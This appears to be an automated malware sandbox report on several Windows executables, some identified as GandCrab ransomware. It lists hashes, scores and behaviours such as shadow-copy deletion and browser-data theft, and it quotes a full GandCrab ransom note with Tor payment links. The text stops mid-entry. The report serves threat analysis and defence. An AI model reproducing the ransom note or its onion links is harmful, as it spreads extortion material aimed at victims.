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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- 7ftDEgLb/ZS0lcmZbHM61KDJ6AOtD78KkA7absMgUXYxWLsC+5+UYF9xVmDp9NTJMZDcAvSVv+DLRWrIKnQXQzua3LPyzokSUuglaqKXwabsGM4pXku5In6gtMQMqg7sgEh1XW1iPMFgiUj/s1LdWpJHdiPjMpn7rCZNO/A31mak0K8RefoREu3BxtlAsseHWfVIIKN0U4NnA3w0Ga7XDLlF3iOIB6ImYbF6Z/7MBN2mgBr2rZ2mU0R7+dxfWLoypoW25ypHEnKnMMuBl1Cmehqo5VrrnNSZu19KSVzOtTAymPz79ICyGBkpCKj0RQwVePfN00RSVCDHtLuJf9AEBnFq/cY8R+K3M7HKmdGRiUfRP93y+fNzLOzjDaO2rwVWxuZ2TzbJpvbdL0N0zPfgSzCzhqApoTPFpp2CPDOx6ihEudzoNVoM6j2VyOmqqBlvZbwDrtsypC8D1fKlVjmT7qd4GuxOgTOwQUyhb/ofzNwkLQejqrjTwFji9zPbKPSghI2dWKf+5gkQvDGihIFfEv5EsSM5AN7hzdQVIFj1CUHPyeWMbZ0L1go/7uRQeyoEinT3CrvrP9dFPEuVIcovLqob4AnecHqVubCDEZSsSLSNnIyaZEI9b5008FGYczrSlaIGDBHFzoGoqA9wiUaNxMzG ---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/b2129ec222655a45

Extracted

Path

F:\$RECYCLE.BIN\S-1-5-21-3434294380-2554721341-1919518612-1000\MORVALFM-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .MORVALFM The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/756f5b77f51355cc | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- 7ftDEgLb/ZS0lcmZbHM61KDJ6AOtD78KkA7absMgUXYxWLsC+5+UYF9xVmD79NDJJpDDAvSVseDGRX3IKnQXQzua3LPyzokSUuglaqKXwabsGM4pXku5In6gtMQMqg7sgEh1XW1iPMFgiUj/s1LdWpJHdiPjMpn7rCZNO/A31mak0K8RefoREu3BxtlAsseHWfVIIKN0U4NnA3w0Ga7XDLlF3iOIB6ImYbF6Z/7MBN2mgBr2rZ2mU0R7+dxfWLoypoW25ypHEnKnMMuBl1Cmehqo5VrrnNSZu19KSVzOtTAymPz79ICyGBkpCKj0RQwVePfN00RSASDAtLyJK9AIBnZqqcY5R7a3NLHNmdeRiUeFP4ryr/NzLOzjDaO2rwVWxuZ2TzbJpvbdL0N0zPfgSzCzhqApoTPFpp2CPDOx6ihEudzoNVoM6j2VyOmqqBlvZbwCrtwyoS8G1f6lXzmZ7q94GuxOgTOwQUyhb/ofzNwkLQejqrjTwFji9zPbKPSghI2dWKf+5gkQvDGihIFfEv5EsSM5AN7hzdQVIFj1CUHPyeWMbZ0I1go/7uRQeyoEinT3CrvrP9dFPEuVIcosLqcb4AnecHqVubCDEZSsSLSNnIyaZEI9b5008FGYczrSlaIGDBHFzoGoqA9wiUaNxMzG ---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/756f5b77f51355cc

Targets

    • Target

      0ddef96bc1cd9fae381e6f228639c145341e10197cc690a70dc0c8acb46d4c2c.exe

    • Size

      278KB

    • MD5

      09180c7dccacffdf04ab67cf8909b5f2

    • SHA1

      ebcd05145f771a48ba3f50bcef46121344817575

    • SHA256

      0ddef96bc1cd9fae381e6f228639c145341e10197cc690a70dc0c8acb46d4c2c

    • SHA512

      5f90272144c53b30d61635bd9d7c4eaeb442282361d00f8183cbf3319a74202f357e593f6a0e522b214b836509332affcf142b31684b5807e114c88b5cb16c4e

    • SSDEEP

      3072:+TDshiWfaoizdfUICi9IyFiD2vEOAaZ/xr+VBFaI1YIYiheeeeeeeeefYDeOiClE:tfaDzdg0IsAwZrMBgkSOG9iO2RK

    Score
    7/10
    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Target

      11a80b997519711f00a741dcf64788fb99554061a4798509ca55ea4e11957eb1.exe

    • Size

      36KB

    • MD5

      b7122a5e603f633bea652729f79b46f1

    • SHA1

      1f7f13d4e5a835a5164b4d5e2decd253fe38e340

    • SHA256

      11a80b997519711f00a741dcf64788fb99554061a4798509ca55ea4e11957eb1

    • SHA512

      f2e34136dfa31c9b7507543306a632ff83480cbbc65b28fe7167aacce6f2fb21b89be837affee9b82def6fe4fccba414ca4af39c968cd456d3102f8cbc36a816

    • SSDEEP

      768:LzM32Zl0l3KLcHPg+RjNAJcsELn/bi2wMlk9aubgIgj0mqew:LSQw/jxP7MTzYrqew

    Score
    7/10
    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      13507f1f60e81e3fcfc2244f5b9e4f5d9d04c6f0beaa34429879afdb24720c07.exe

    • Size

      255KB

    • MD5

      e4611c388a33ccd1a7d3d4a996e32fa3

    • SHA1

      61c206f323eeb960873f5d9728011b774075c01a

    • SHA256

      13507f1f60e81e3fcfc2244f5b9e4f5d9d04c6f0beaa34429879afdb24720c07

    • SHA512

      596630e87eca6aa87a5861a77f21eb9cecf82add1c5d02a27c36b0ec22f8c770e2cd81b240a3db14ea59c09389360e2a1aaf5e28ab5627e8714f0cfef8dddce0

    • SSDEEP

      6144:vcOUIh8dlf/I2K7OQp/ymns6U7b3CN0lo3On:08h8rHI2K7jp/UXSNb+n

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (287) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

    • Target

      1c53d9fda466a35e127ea0f774d776595ac99f837e0b9fd79ef288859e0a82dc.exe

    • Size

      46KB

    • MD5

      d1cb2d7ca5643dca3f7143ef440209f4

    • SHA1

      55746c8664c60bd78a730a2421e0ec4b3bc424b3

    • SHA256

      1c53d9fda466a35e127ea0f774d776595ac99f837e0b9fd79ef288859e0a82dc

    • SHA512

      abd18bb118590e46c26c9518a6c6b7acf240e5652c0cac6cc5d8a6c0d8c4143c0fff634e95b29c604524d71cec81c97cc411bae33c029037621ccc41591d225e

    • SSDEEP

      768:xBiSJXLnGKOGqvrFKrfJx860qT/b3rk+5CibTx5b/IREKbSrVMmijabyrHehx+BM:xRgxvhKrf38KT/bgoTx5seKbSxWa0ccm

    Score
    7/10
    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      3ae9ec7dc2a13da4eb7ca8467ac659f75bf4dbef45fc13ff63011685c335bde0.exe

    • Size

      43KB

    • MD5

      0d7f21d96c832bee780168489799888a

    • SHA1

      d916ffc55be542fca048ef13a9ec3bef3c70d464

    • SHA256

      3ae9ec7dc2a13da4eb7ca8467ac659f75bf4dbef45fc13ff63011685c335bde0

    • SHA512

      4a59e60a20f15260def46fed3d4ee70b04e830643348c3018f715caf43659e956e920f5cd9adce55d2495e5fa47f192219052f1b13e13853ddf5e0e2749ecf50

    • SSDEEP

      768:jI2Er0ofK5/lQ0YSHiZka7NgpNGYzsUSy9PlQ1b3tqDDiNeH4jx9rHcKHL4R:jIL4ofg/lTYSHSMPdYTyCzx9FHL

    Score
    3/10
    • Target

      41ad73fa68a66ac06fe2d12e35dc537a8f5c8ec534a0a82d13f2769f6bb43bf5.exe

    • Size

      45KB

    • MD5

      9f7fa29d1f74d761991dac02be8b46bc

    • SHA1

      e3865acf369a4f118a97169a957c820f94db515e

    • SHA256

      41ad73fa68a66ac06fe2d12e35dc537a8f5c8ec534a0a82d13f2769f6bb43bf5

    • SHA512

      7e78f4514e50b68cbc19a3e40543a7929b4da338c8fbccae7d43fc1082285a06c4708bc9ea4d4aa32906ebb8a3df9bbfbe441b48477d64c77896fd6a0e17440e

    • SSDEEP

      768:8p+cLlu75U5xC/4VBzVdmd7kPHXvqPG+t2u3juYoxguzmQxyMMi0:8jlu75U5QAXrmdNPx4u6Yox/hEMMi0

    Score
    7/10
    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      42748e1504f668977c0a0b6ac285b9f2935334c0400d0a1df91673c8e3761312.exe

    • Size

      224KB

    • MD5

      c49902c175154630349cc10a9eda0363

    • SHA1

      7074240b4abd8e8eac3e0d405630b4ab10e5a744

    • SHA256

      42748e1504f668977c0a0b6ac285b9f2935334c0400d0a1df91673c8e3761312

    • SHA512

      f004185e7cb730b991e19b75e33a84ae2b903c1c4c1a1dc7b1c8bb7e64befa6cc80048a4c73a7cb25450da4a95eff6652e19ff17f80f0e1e3eb99069bf474820

    • SSDEEP

      3072:tPokaghmM6wQ+ks8Bv/ESCGmYSfKpmC9tPozIx/tAg0FujtBy9kVV8av:ui4MqhBnESCGmrK7NtAOqGIav

    • Renames multiple (137) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Deletes itself

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Legitimate hosting services abused for malware hosting/C2

    • Target

      46d2ba1c63ad30cc0f8952ad248ad7f53382ad7e61df145b7c422c3ac1d111b4.exe

    • Size

      12KB

    • MD5

      095ae02d1a70dbabccd47bd0d0a706eb

    • SHA1

      020c8440d7d1dbd8fc415fbce40191ac195c0e6c

    • SHA256

      46d2ba1c63ad30cc0f8952ad248ad7f53382ad7e61df145b7c422c3ac1d111b4

    • SHA512

      8b74f8bd1ec052df05b92145d2bb447194974b2ac0a9d68e7d3e026d2e902cbc9ec4080b72d67fb3911cce4d8c23814bc26d8e07a800c3e1dfdd3f5fcaf3a7c9

    • SSDEEP

      192:FSRoff34J4cvAWyjx4cL9rd83Miy4lzknkrwzZrAU/i8stYcFOKc03KY:FSKa7wd4w4+avUZrv/iptYcFOKc03K

    • Renames multiple (73) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Target

      49bac3903d2a9fd2ce742c35f8d9804061616874cf9e1a94dfd5007e25a3ca3e.exe

    • Size

      80KB

    • MD5

      e6e6dbeb428a08f36853e0859c0d6710

    • SHA1

      48201ffc1525b8b93c8a624f66c09cbb51575301

    • SHA256

      49bac3903d2a9fd2ce742c35f8d9804061616874cf9e1a94dfd5007e25a3ca3e

    • SHA512

      e38a97d60da1ead834e95165e30771217da7682871e4596a0ec42598cc6172357d5b3832267a5d84e52cdad59fcf9df1e042299e58a48a78f4708f3a08482901

    • SSDEEP

      1536:gwGBY/Hnnd3gAd9JND4/dqDoCL92SVmf9m2dSEKuT2PRB6:gwUGHnndQAda/sD90SuVSEKuqJB6

    Score
    1/10
    • Target

      4ffbdd03f2424c3013aac4b0cb5eb49a991f89a2533a24f56f47c1a82819c575.exe

    • Size

      171KB

    • MD5

      93cb86dedb2c4a4fa472e47600e85874

    • SHA1

      7462638a800fdd18a0614172c582aebd47a91253

    • SHA256

      4ffbdd03f2424c3013aac4b0cb5eb49a991f89a2533a24f56f47c1a82819c575

    • SHA512

      e5ae4e0806907651c6fd2bdc7703e177d0b89ecf494151d18076db062e1f60b4d2241e921be08704273dcf1d9e42135dc459a681c01592ed73c7c84d8bbddf87

    • SSDEEP

      3072:mmyqA/BIkrL0kMZ2m7ksIS/bOpd5sF2Fj3YyP:lQ/BIkf0V27sFbONsF2Fjx

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (274) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

    • Target

      55aa55229ea26121048b8c5f63a8b6921f134d425fba1eabd754281ca6466b70.exe

    • Size

      138KB

    • MD5

      681211a7b964eaffd13e0610d82a25e7

    • SHA1

      62a4a462c4535ef21411d29c9d8273cbe2fbc2fa

    • SHA256

      55aa55229ea26121048b8c5f63a8b6921f134d425fba1eabd754281ca6466b70

    • SHA512

      17c0edafc5c652841d684eb9ec5909ff1b0b47a0c04bd689a81cf03ade9e0efa077170a2c64f3c993f548838276d86774b73922b9484c1d22d182e41c5a02e8e

    • SSDEEP

      3072:vDaz8uS5prazAw8JN1SJFkuh2z5lWmd4ox33:OySAUh6hd4ox

    • Renames multiple (122) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Deletes itself

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Target

      63feec522666cd97ec0a253cc17cf629a7bdb096c04f0b2de4c1bf959d67a77d.exe

    • Size

      273KB

    • MD5

      320dd92ca62a321d2ac4539f105aa286

    • SHA1

      f46e943bf9e8609167656d5f26b4bdf80019b016

    • SHA256

      63feec522666cd97ec0a253cc17cf629a7bdb096c04f0b2de4c1bf959d67a77d

    • SHA512

      89861ebe63d42d099b751f84bbe7a7b37a363d178e73a6467cbffbaa2ae99167f81cfe3695b64fa124a7fd74097ab568a3f4e2a64a4fac0ef0a6b1e9d3fc943e

    • SSDEEP

      3072:GdDlBBfTiNcKwLQ2zZE99VYvUcT0mPqkaYc+dv+Ld4NTJnLOXJKYlEQqMRiPVHUc:K3EAqkhc+1bLxdxMR0VHT9GHq

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (281) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

    • Target

      729f51d9a39f87c71d4f3fdc6ff811f953c9de16d769cb2b290128fe9d4e7532.exe

    • Size

      111KB

    • MD5

      bff182346d47cb63a14d57c20775ca52

    • SHA1

      3c095f73b9e5155ab9d08496909a9344c86a0da7

    • SHA256

      729f51d9a39f87c71d4f3fdc6ff811f953c9de16d769cb2b290128fe9d4e7532

    • SHA512

      d241a3b33abd867dce860651217bf0d19d9a2e59bb4f8995ab0910333e5317e166b7ce21b319cc0ffde76c640395570c7baeecd4d662e2dcbcdda46bed2570fe

    • SSDEEP

      3072:4jsU4kcPBbaCcsKsraOkWo86d5TEi9fh40EZl0:04kuRaVzQ7SQi95p

    Score
    7/10
    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Target

      72ddceebe717992c1486a2d5a5e9e20ad331a98a146d2976c943c983e088f66b.exe

    • Size

      268KB

    • MD5

      4e2b58f99ad9f13c2b09f0741739775d

    • SHA1

      6a51d0cd9ea189babad031864217ddd3a7ddba84

    • SHA256

      72ddceebe717992c1486a2d5a5e9e20ad331a98a146d2976c943c983e088f66b

    • SHA512

      dd74f94fbe6324410e832ab22b2807bbc5bc4171704477898a2b64a1ce6a7b3a289a4fb399412152b33a6b286e439c8d89eca4d5cba7bcd65dcb864e18487ebd

    • SSDEEP

      3072:gfLB0w+Wv5pa/Dc/nuOL23e8aoeE+aqfnfj59AEYfzaBUGm+0lh831QPfrwV6cFK:+TgenuOLCL+559AEq+m+jmEIcFaNtN

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (8610) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Deletes itself

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Drops desktop.ini file(s)

    • Suspicious use of SetThreadContext

    • Target

      74ec6fffadcf1771b04dc4fce45f21438e246ac62c1a26d566be68591f6bfd7a.exe

    • Size

      169KB

    • MD5

      aa98b4d3b2f7fdbe2a90df0a8e6c0bde

    • SHA1

      19c84fc638754e0123efc47df31696ca2acfda7f

    • SHA256

      74ec6fffadcf1771b04dc4fce45f21438e246ac62c1a26d566be68591f6bfd7a

    • SHA512

      128fe9a14f2d9d4655a56089a7cb26b28d7d0423412e6d677ae29dbc7eacda99f6c8788e443d2ee6264ab0a25a05f98381d5042447ae1b9269b98fcefe39267a

    • SSDEEP

      3072:Qpd5kyqA/BIkrL0kMZ2m7ksIS/bUctF2F1:QNkQ/BIkf0V27sFbUctF2F

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (271) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

    • Target

      7cf39ebb4409b13a7c153abff6661cc4d28d8d7109543d6419438ac9f2f1be57.exe

    • Size

      443KB

    • MD5

      fd5ae61959c9590036881cb809891029

    • SHA1

      f930d520913b407ab3cb5d7ecf5ee2a7dca1c071

    • SHA256

      7cf39ebb4409b13a7c153abff6661cc4d28d8d7109543d6419438ac9f2f1be57

    • SHA512

      2feb832498370c7635d42913a4328b3ba797e67cf6f7cdadc769dd549b251b05f340899229fcf76ccc1f8fe5d1512d769f581079ac06c6459669d536ba1c1fbb

    • SSDEEP

      6144:I9LJ4d2DvM1V4LKPx7WlkJhW0lNVel9zXAjqiORKmb+Ylr48ov/P:IIdBrSKPx+T597iOMOTh48ov

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Modifies boot configuration data using bcdedit

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Deletes itself

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Drops file in System32 directory

    • Sets desktop wallpaper using registry

    • Target

      85110c71485fa6b2e79ff0bf5562ab8367e7ca0f31ee27d96ccc9171bd94c7d3.exe

    • Size

      490KB

    • MD5

      fbc52bacf2a9cf126ef406ed1d1dbfa6

    • SHA1

      8638cd625af218e16e5cfc8153efb5b058b78845

    • SHA256

      85110c71485fa6b2e79ff0bf5562ab8367e7ca0f31ee27d96ccc9171bd94c7d3

    • SHA512

      94f39c321d27a1fd515d78e0050417959d067e97c34e1a3c26b7d359f75d8cbeafbf0b16ae6a750b3c78726c16fabd2d282eda74efebe76e81184723d6271352

    • SSDEEP

      12288:Yutrzh9xOXojrUymULpA3mxW7tOmg696UXjoA9GMvWToEJeN:Yutr5OYjjmUdymg0gzbgHo5

    • Modifies Windows Defender Real-time Protection settings

    • Modifies security service

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Boot or Logon Autostart Execution: Active Setup

      Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    • Disables taskbar notifications via registry modification

    • Event Triggered Execution: Image File Execution Options Injection

    • Sets service image path in registry

    • Stops running service(s)

    • Executes dropped EXE

    • Loads dropped DLL

    • Drops desktop.ini file(s)

    • Target

      8d2b0cf8ad5948bd2267aca64600d7e9d45b4dc8ad6a300d5d3c029bd003220d.exe

    • Size

      92KB

    • MD5

      50f138dfaad27ff53d8f69352c25e770

    • SHA1

      a8267267a71db76301c09b146dcd0ad1fe5195fd

    • SHA256

      8d2b0cf8ad5948bd2267aca64600d7e9d45b4dc8ad6a300d5d3c029bd003220d

    • SHA512

      b01e39cc2374206ea1d1b7a24896fcac646d189fdf5e6369e9327635a5b7e0b6206096d6bc7c548c8a94915006e73553d686a9b7824af614da3600df7aa58bda

    • SSDEEP

      1536:p7mqIEF7ivk6miU9ffYm4SeSwvGJlUFYfK7csKsraOkWo8XKlH+ymmfAsLASAq:Mvgivw9wBaGcsKsraOkWo86lHB9fxLA5

    Score
    7/10
    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Target

      9001d3e08e34598061281c2187b4deeee8022081f4706e9b7b89d52244ccf426.exe

    • Size

      410KB

    • MD5

